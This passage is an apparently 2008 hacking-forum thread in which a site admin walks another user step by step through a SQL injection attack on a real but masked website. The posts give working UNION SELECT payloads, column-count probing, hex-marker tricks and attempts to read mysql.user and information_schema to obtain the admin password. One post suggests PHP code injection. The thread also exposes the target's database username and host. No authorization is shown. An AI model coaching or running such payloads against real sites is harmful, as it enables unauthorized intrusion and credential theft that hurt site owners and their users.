 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
xss? |
 |
 Posted: Fri Nov 07, 2008 10:46 pm |
 |
|
| skmpz |
| Advanced user |
 |
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
 |
|
 |
|
|
|
|
|
| Posted: Sat Nov 08, 2008 1:32 am |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
You have sql injection here. Getting admin password ... maybe ... but that's not so easy.
First try to get syntax right. Try:
| Code: |
index.php?mode=search&content='--+
|
| Code: |
index.php?mode=search&content=')--+
|
| Code: |
index.php?mode=search&content='))--+
|
Please post here possible error messages and other possible feedback, then i will show you next step  |
|
|
|
|
| Posted: Sat Nov 08, 2008 3:06 am |
|
|
| skmpz |
| Advanced user |
|
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| Posted: Sat Nov 08, 2008 3:10 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Hmm, try this:
| Code: |
index.php?mode=search&content=-1--+
|
| Code: |
index.php?mode=search&content=-1+OR+1=1--+
|
By the way, how does look like "content" in original query? Numeric? |
|
|
|
|
| Posted: Sat Nov 08, 2008 3:11 am |
|
|
| skmpz |
| Advanced user |
|
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
|
|
|
|
| those open a page in a website.... |
|
|
|
|
| Posted: Sat Nov 08, 2008 3:32 am |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
OK, now this:
| Code: |
index.php?mode=search&content=-1+UNION+SELECT+1--+
|
|
|
|
|
|
| Posted: Sat Nov 08, 2008 5:59 am |
|
|
| gibbocool |
| Advanced user |
 |
|
| Joined: Jan 22, 2008 |
| Posts: 208 |
|
|
|
|
|
|
|
I was just wondering if he can inject php code into the page?
index.php?mode=search&content=>'>phpinfo() |
|
|
|
|
| Posted: Sat Nov 08, 2008 12:02 pm |
|
|
| skmpz |
| Advanced user |
|
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
|
|
|
|
| waraxe wrote: | OK, now this:
| Code: |
index.php?mode=search&content=-1+UNION+SELECT+1--+
|
|
| Code: | | The used SELECT statements have a different number of columns |
|
|
|
|
|
| Posted: Sat Nov 08, 2008 12:13 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
OK, it's getting better
Next you need to find out exact column count
| Code: |
index.php?mode=search&content=-1+UNION+SELECT+1,2--+
|
| Code: |
index.php?mode=search&content=-1+UNION+SELECT+1,2,3--+
|
| Code: |
index.php?mode=search&content=-1+UNION+SELECT+1,2,3,4--+
|
Follow this pattern, till there is no "different number of columns". This number can be big, even > 50 |
|
|
|
|
| Posted: Sat Nov 08, 2008 12:25 pm |
|
|
| skmpz |
| Advanced user |
|
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
|
|
|
|
done .. at:
| Code: | | http://www.xxxxx.com/index.php?mode=search&content=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10--+ |
it displays the website |
|
|
|
|
| Posted: Sat Nov 08, 2008 12:30 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
OK, now you need visual feedback. Try:
| Code: |
index.php?mode=search&content=-1+UNION+SELECT+1111,2222,3333,4444,5555,6666,7777,8888,9999,101010--+
|
Look at resulting webpage and look for those numbers. Use "CTRL+F" search if needed. And finally look at source, if there are no visual feedback. |
|
|
|
|
|
|
|
|
| Posted: Sat Nov 08, 2008 12:36 pm |
|
|
| skmpz |
| Advanced user |
|
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
|
|
|
|
i cant find the numbers on the site .. i find them in the source code..
| Code: | <table width="460" border="0" cellspacing="1" cellpadding="1">
<tr>
<td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
« Προγούμενο 1 | <a href="/index.php?pageNum_searchresults=1&mode=search&content=-1 UNION SELECT 1111,2222,3333,4444,5555,6666,7777,8888,9999,101010-- ">2</a> | <a href="/index.php?pageNum_searchresults=2&mode=search&content=-1 UNION SELECT 1111,2222,3333,4444,5555,6666,7777,8888,9999,101010-- ">3</a> | <a href="/index.php?pageNum_searchresults=3&mode=search&content=-1 UNION SELECT 1111,2222,3333,4444,5555,6666,7777,8888,9999,101010-- ">4</a> | <a href="/index.php?pageNum_searchresults=4&mode=search&content=-1 UNION SELECT 1111,2222,3333,4444,5555,6666,7777,8888,9999,101010-- ">5</a> | <a href="/index.php?pageNum_searchresults=5&mode=search&content=-1 UNION SELECT 1111,2222,3333,4444,5555,6666,7777,8888,9999,101010-- ">6</a> | <a href="/index.php?pageNum_searchresults=6&mode=search&content=-1 UNION SELECT 1111,2222,3333,4444,5555,6666,7777,8888,9999,101010-- ">7</a> | <a href="/index.php?pageNum_searchresults=7&mode=search&content=-1 UNION SELECT 1111,2222,3333,4444,5555,6666,7777,8888,9999,101010-- ">8</a> | <a href="/index.php?pageNum_searchresults=8&mode=search&content=-1 UNION SELECT 1111,2222,3333,4444,5555,6666,7777,8888,9999,101010-- ">9</a> | <a href="/index.php?pageNum_searchresults=9&mode=search&content=-1 UNION SELECT 1111,2222,3333,4444,5555,6666,7777,8888,9999,101010-- ">10</a> <a href="/index.php?pageNum_searchresults=1&mode=search&content=-1 UNION SELECT 1111,2222,3333,4444,5555,6666,7777,8888,9999,101010-- ">Επόμενο »</a></font></div></td>
</tr>
</table>
|
|
|
|
|
|
|
|
|
|
| Posted: Sat Nov 08, 2008 12:44 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
If there is no visual feedback, then it's more difficult to exploit. Try this:
| Code: |
index.php?mode=search&content=-1+UNION+SELECT+0x78797a,0x78797a,0x78797a,0x78797a,0x78797a,0x78797a,0x78797a,0x78797a,0x78797a,0x78797a--+
|
Look at source code and search for "xyz". Some other tests:
| Code: |
http://www.xxxxx.com/index.php?mode=search&content=-1+UNION+SELECT+name,2,3,4,5,6,7,8,9,10+FROM+mysql.user--+
|
| Code: |
http://www.xxxxx.com/index.php?mode=search&content=-1+UNION+SELECT+table_name,2,3,4,5,6,7,8,9,10+FROM+information_schema.tables--+
|
|
|
|
|
|
|
|
|
|
| Posted: Sat Nov 08, 2008 12:51 pm |
|
|
| skmpz |
| Advanced user |
|
|
| Joined: Oct 11, 2008 |
| Posts: 169 |
| Location: Cyprus |
|
|
|
|
|
|
| Code: | | index.php?mode=search&content=-1+UNION+SELECT+0x78797a,0x78797a,0x78797a,0x78797a,0x78797a,0x78797a,0x78797a,0x78797a,0x78797a,0x78797a--+ |
With this it displays it only as page title
| Code: | | http://www.xxxxx.com/index.php?mode=search&content=-1+UNION+SELECT+name,2,3,4,5,6,7,8,9,10+FROM+mysql.user--+ |
SELECT command denied to user 'megahz4'@'fusion.bpweb.net' for table 'user'
| Code: | | http://www.xxxxx.com/index.php?mode=search&content=-1+UNION+SELECT+table_name,2,3,4,5,6,7,8,9,10+FROM+information_schema.tables--+ |
SELECT command denied to user 'megahz4'@'fusion.bpweb.net' for table 'tables' |
|
|
|
|
|
|
|
|
| Posted: Sat Nov 08, 2008 1:04 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
So it's mysql < 5.0 and it's not easy to find out table names ...
Are you sure, that there was no "xyz" in source code? Becuse if you don't have visual feedback, then you must use blind sql injection methods and it means, that you need some program or script for this. My suggestion:
http://www.sqlpowerinjector.com/ |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 4
Goto page 1, 2, 3, 4Next
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 60
Members: 0
Total: 60
